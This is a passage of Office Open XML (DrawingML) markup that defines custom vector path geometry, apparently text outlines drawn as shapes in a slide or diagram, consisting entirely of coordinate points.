              <a:ext cx="790575" cy="107314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="18226" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24873" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18226" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="89459" y="18403"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="76088" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76088" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89459" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89459" y="18403"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="24873" y="18403"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12489" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40201" y="77271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48173" y="77271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56161" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44989" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24873" y="18403"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="89459" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="70894" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44989" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56161" y="60426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76088" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89459" y="18403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89459" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="174060" y="38974"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147367" y="38974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149986" y="39155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155023" y="39877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157191" y="40577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160872" y="42677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162340" y="44167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163334" y="46064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164351" y="47938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164847" y="50332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164847" y="55164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157485" y="55526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150574" y="56068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114686" y="72755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113467" y="77361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113467" y="90052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115815" y="95787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125256" y="104774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131015" y="107032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141495" y="107032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144724" y="106671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150190" y="105271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152629" y="104413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154729" y="103374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156536" y="102561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158388" y="101477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163741" y="97661"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164847" y="96916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177472" y="96916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177472" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137045" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133070" y="94139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127853" y="89758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126543" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126543" y="78377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127672" y="75374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160380" y="65687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160213" y="65687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164847" y="65416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177472" y="65416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177472" y="48955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176727" y="44890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174261" y="39425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174140" y="39155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174060" y="38974"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="177472" y="96916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="164847" y="96916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164847" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177472" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177472" y="96916"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="177472" y="65416"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="164847" y="65416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164847" y="86393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161708" y="88810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158298" y="90887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150912" y="94364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146847" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177472" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177472" y="65416"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="149986" y="27774"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="140139" y="27774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135020" y="28225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135272" y="28225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126182" y="29806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122613" y="30551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120129" y="31229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120129" y="44167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120630" y="44167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125166" y="42429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129412" y="41164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137587" y="39425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141291" y="38974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174060" y="38974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173768" y="38319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171600" y="35655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165886" y="31477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162476" y="29964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154616" y="28225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149986" y="27774"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="218012" y="3838"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="203716" y="3838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203716" y="16980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218012" y="16980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218012" y="3838"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="217199" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="204529" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204529" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217199" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217199" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="256249" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="243579" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243579" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256249" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256249" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="330057" y="82013"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="329108" y="82013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329108" y="98723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335093" y="101387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340965" y="103374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="352529" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359033" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373013" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378772" y="105948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388371" y="102697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392549" y="100461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399072" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360569" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354313" y="94071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340988" y="89487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335138" y="86235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330057" y="82013"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="374481" y="2687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="367412" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359574" y="3190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329718" y="23009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329718" y="38748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="364521" y="60584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372404" y="61758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376040" y="62480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392640" y="83322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390336" y="87455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381121" y="93664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374685" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399072" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="399438" y="94929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401990" y="91700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403797" y="87861"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405626" y="84045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406529" y="80184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406529" y="69074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404655" y="63474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365221" y="46855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="361111" y="46087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343608" y="25493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345776" y="21654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354448" y="15716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360208" y="14225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402487" y="14225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402487" y="9709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397947" y="7722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392730" y="6074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380941" y="3364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374481" y="2687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="402487" y="14225"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="373872" y="14225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380241" y="15287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392707" y="19554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397721" y="22242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401538" y="25493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402487" y="25493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402487" y="14225"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="471281" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="461117" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453283" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425115" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424485" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425141" y="76508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455516" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="455767" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464279" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469180" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473855" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482754" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487113" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491404" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491404" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460282" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456736" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450299" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447521" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445195" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442756" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440935" y="84248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438058" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437358" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437358" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492872" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492872" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492687" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437351" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437804" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437900" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440181" y="47961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="448244" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453642" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485737" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484606" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479095" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471281" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="491404" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="490726" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488513" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484809" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="474420" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469271" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491404" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491404" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="485737" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="467170" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472207" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478801" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480495" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480541" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492687" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492355" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490805" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="488222" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485737" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="527269" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="514599" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514599" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527269" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527269" y="51461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530657" y="48706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534157" y="46471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541452" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544740" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561621" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561621" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527269" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527269" y="29874"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="561621" y="42248"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="553671" y="42248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557217" y="42655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="559236" y="43016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560943" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561621" y="43422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561621" y="42248"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="558143" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="547089" y="29874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544433" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536755" y="33825"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532305" y="36693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527269" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561621" y="40735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561621" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="561766" y="30438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558143" y="29874"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="580705" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="566928" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597215" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609975" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616199" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604035" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="580705" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="640465" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="627162" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604035" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616199" y="89555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="640465" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="699728" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="689565" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="681734" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653563" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652932" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653592" y="76508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683976" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684226" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692727" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697627" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702325" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711224" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715583" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719851" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719851" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="688729" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685183" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678769" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675991" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="673642" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="671226" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669383" y="84248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666528" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665828" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665828" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721342" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721342" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721156" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665821" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666274" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666370" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="668651" y="47961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676691" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="682112" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714206" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713076" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707565" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699728" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="719851" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="719174" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716983" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713279" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="702890" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697718" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719851" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719851" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="714206" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="695640" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700654" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707271" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708943" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708988" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721156" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720825" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719275" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716692" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="714206" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="790575" h="107314">
                  <a:moveTo>
                    <a:pt x="755739" y="29874"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="743046" y="29874"/>
